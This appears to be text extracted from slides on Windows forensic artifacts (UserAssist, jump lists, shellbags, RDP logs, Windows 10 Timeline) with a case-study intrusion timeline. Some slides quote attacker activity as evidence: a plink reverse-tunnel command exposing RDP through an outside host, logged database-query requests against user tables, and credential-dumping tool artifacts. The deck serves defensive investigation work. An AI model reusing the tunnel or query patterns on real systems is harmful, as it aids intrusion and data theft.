  • 27. 27 Decoded User Assist Data Key Last Write Registry Key Times Executed 2019-01-22 01:36:23 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}msiexec.exe 1 2019-01-22 01:33:48 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}ServerManager.exe 1 2019-01-22 01:39:23 C:UsersdaveDesktopomg.exe 1 2019-01-22 01:43:23 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 1 2019-01-22 01:44:56 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 1 2019-01-22 02:28:01 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 3
  • 28. 28 Jump Lists § Provides user quick access to recently used apps § Each user has their own jump lists § Shows evidence of accessed resources § Two types of jump lists § Requires parsing to be human readable - JumpListParser, JLECmd, jmp Automatic %APPDATA%MicrosoftWindowsRecentAutomaticDestinations Custom %APPDATA%MicrosoftWindowsRecentCustomDestinations
  • 29. 29 Jump Lists § Automatic – created automatically when a user interacts with a resource • Custom – created when a user “pins” an item
  • 30. 30 Browser History, Cache, and Downloads § User Specific Artifact § Enumerate Browsers § Extract Browsing History § Collect Browser Cache § Collect Downloaded Files
  • 31. 31 Web Server Side Data - Logging GET vs. POST GET Requests “Retrieve” content specified in the request address Key-value pairs passed as part of URI Fully captured in logs (cs-uri-query) Impact: Malicious activity in POST requests can be hard to detect! POST Requests Tell the server to accept the data enclosed in the packet contents Key-value pairs passed in the message body Request parameters not logged
  • 32. 32 Web Server Side Data - Content Encoding § Special characters in HTTP requests are URL Encoded by the web browser - % followed by ASCII character code - Spaces can be represented by %20 or + http://www.foo.com/search.aspx?name=John & Mark Co.&op=1 …is converted to (and will be logged as)… http://www.foo.com/search.aspx?name= John%20%26%20Mark%20Co.&op=1
  • 33. 33 GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG" GET /images/Schema.asp GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS” &sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_U SERS"& GET /images/Connect.asp GET /images/Schema.asp GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM> _USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A= GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
  • 34. 34 What do we know so far? Time Source Details 2019-01-22 01:33:23EventLog Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 § What next?
  • 36. 36 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2018-12-24 23:11:21 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 00:23:33 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
  • 38. 38 RDP MRU Keys Key Last Write Registry Key 2018-12-25 00:00:23 Hostname: 192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42 Hostname: RewardsDB User: rewardsDBO 2019-01-01 02:53:11 Hostname: Webserver2 User: rewardsfrank 2019-01-15 00:15:01 Hostname: ITJumpserver User: rewardsdave
  • 39. 39 RDP Bitmap Cache Files § Store frequently used images used during RDP session § Improves user experience § Located at: - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCachebcache2.bmc - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCacheCache[0-9]{4}.bin
  • 40. 40
  • 41. 41 Uninstall or Disable Endpoint Agents
  • 42. 42 Registry Shellbags § Windows Explorer usage § Records size, position, view of windows § Provides evidence of user access to local & remote directories HKEY_USERS{SID}SoftwareMicrosoftWindowsShell HKEY_USERS{SID}SoftwareMicrosoftWindowsShellNoRoam Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT
  • 43. 43 Registry Shellbags Decoded shellbag keys can provide - Paths to directories accessed via Explorer - Date and time at which last access occurred - MAC times of each path tracked in shellbags Decoding tools - RegRipper - shellbags.py github.com/williballenthin/shellbags - ShellBagsExplorer • https://ericzimmerman.github.io/#!index.md
  • 44. 44 ShellBags MRU Time Modified Accessed Created Resource 2019-01-11 03:51:36 2018-12-30 02:59:32 2016-12-30 02:59:32 2017-11-05 14:40:54 My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54 2018-05-07 15:54:36 2016-11-05 14:40:54 2017-11-05 14:40:54 My ComputerC:UsersITAdminAppData [Desktop00430] My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2018-12-25 02:40:59 2012-11-11 17:00:06 2012-11-11 17:00:06 2012-11-11 17:00:06 My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59 2014-05-23 21:53:24 2018-05-23 21:53:24 2011-04-07 12:28:28 My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2019-01-12 03:41:41 2017-01-10 14:07:12 2017-01-10 14:07:12 2017-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:42:22 2017-01-11 18:42:04 2017-01-11 18:42:04 2017-01-10 14:06:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49 2017-01-05 21:37:52 2017-01-05 21:37:52 2017-01-05 20:05:26 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:41:42 2016-12-18 14:49:14 2016-12-18 14:49:14 2015-01-26 19:43:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:53:14 2016-12-15 20:57:58 2016-12-15 20:57:58 2016-11-24 22:18:00 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47 2015-09-23 13:52:10 2015-09-23 13:52:10 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-11 03:46:21 2016-09-27 13:38:42 2016-09-27 13:38:42 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010]
  • 45. 45 How did the attacker access the host? § Remotely installed ScreenConnect § Switched Tactics and removed ScreenConnect/Installed malware § Non-Interactive malware used to download and execute PLink.exe to create tunnel - tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389 § Connected to local host using remote desktop Key Value Data SoftwareSimonTatham PuTTYSshHostKeys rsa2@<IP Address> 0x10001,0x SSH Public Key
  • 46. 46 Windows 10 Timeline § Timeline exists in Task View - Accessed by hitting Win+Tab § Records timeline of user activity for specific applications § User Engaged § Generic Events § Database location: - C:UsersUserAppDataLocalConnectedDevicesPlatformL.UserActivitiesCache.db
  • 49. 49 Windows Timeline § Parsing - Multiple Available Tools • https://tzworks.net/prototype_page.php?proto_id=41 • https://github.com/log2timeline/plaso/pull/2076 • https://ericzimmerman.github.io/#!index.md - SQLite3
  • 50. 50 Windows 10 Timeline Start - UTC End - UTC Application DisplayText or Type Details 2019-02-08 23:04:27N/A WinRARWinRAR.exe sdl-redline.zip Z:Downloadssdl-redline.zip 2019-02-09 01:07:06N/A Cisco.AnyConnect Cisco AnyConnect Secure Mobility Client black 2019-02-10 13:09:53N/A Microsoft.MicrosoftEdge cmd - Bing https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json 2019-02-10 13:10:34 2019-02-10 13:10:51Microsoft.MicrosoftEdge UserEngaged https://ericzimmerman.github.io/#!index.md 2019-02-12 13:58:46 2019-02-12 13:58:48Microsoft.MicrosoftEdge UserEngaged https://www.google.com/search?eiadd+on+vpn&oq=add +on+vpn 2019-02-12 13:59:02N/A WiresharkWireshark.exe Wireshark black 2019-02-12 18:57:11N/A WiresharkWireshark.exe 107.x.x.x-10.24.206.133- 1552495684.flow Z:Downloads107.x.x.x-10.24.206.133- 1552495684.flow 2019-02-12 19:02:27N/A WiresharkWireshark.exe 104.x.x.x-10.222.7.44- 1552442420.flow Z:Downloads104.x.x.x-10.222.7.44-1552442420.flow 2019-02-16 00:47:42N/A Microsoft.MSPaint Paint 3D black 2019-02-16 00:50:34N/A Microsoft.MSPaint Picture2.jpg Z:DesktopPicture2.jpg 2019-02-16 03:16:13N/A mspaint.exe Picture1.png Z:PresentationsDFIRPicture1.png 2019-02-16 03:16:56N/A mspaint.exe Picture2.png Z:PresentationsDFIRPicture2.png 2019-02-16 18:41:00N/A WinRARWinRAR.exe 4mXTuLp5E19cNdVvUX9jzb.zip Z:DownloadsTuLp5E19cNdVvUX9jzb.zip 2019-02-16 18:41:33N/A RedlineRedline.exe MBP0074.mans Z:MBP0074.mans
  • 52. 52 Time Source System Details 2018-12-24 23:11:21EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2018-12-25 00:00:23RDP:MRU ConfPC Hostname:192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42RDP:MRU ConfPC Hostname:RewardsDB User: rewardsDBO 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-01 02:53:11RDP:MRU ConfPC Hostname:Webserver2 User: rewardsfrank 2019-01-11 03:46:21ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010] 2019-01-11 03:51:36ShellBag:MRU ConfPC My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54ShellBag:MRU ConfPC My ComputerC:UsersITAdminAppData [Desktop00430] 2019-01-12 03:41:41ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:41:42ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:42:22ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:53:14ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2019-01-15 00:15:01RDP:MRU ConfPC Hostname:ITJumpserver User:rewardsdave 2019-01-22 00:23:33EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time Jump C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time Jump C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave Jump C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Jump Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Jump Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:55:45EventLog ConfPC Remote Desktop Services: Session has been disconnected: User: rewardsITAdmin Session ID: 2 Source Network Address: 127.0.0.1
  • 53. 53 Case Study – Expanding View § Shellbags § RDP Logs § RDP Connections § LNK Files § MRU Keys § MuiCache § Jump Lists § RDP Bitmap Cache § SimonTathom Registry Values § Windows 10 Timeline
  • 54. 54 Other fun Artifacts Details Windows Recycler C:$Recycle.Bin<SID> $R<RAND>.<EXT> $I<RAND>.<EXT> Browser History ftp://<AttackerWebsite> file:///C:/Windows/127.0.0.1.pwdump OpenWith Registry Keys SoftwareMicrosoftWindowsCurrentVersionExplorerFileExts .cachedumpOpenWithList .fgdump-logOpenWithList ViClient Logs C:UsersadminAppDataLocalVMwarevpxviclient-#-0000.log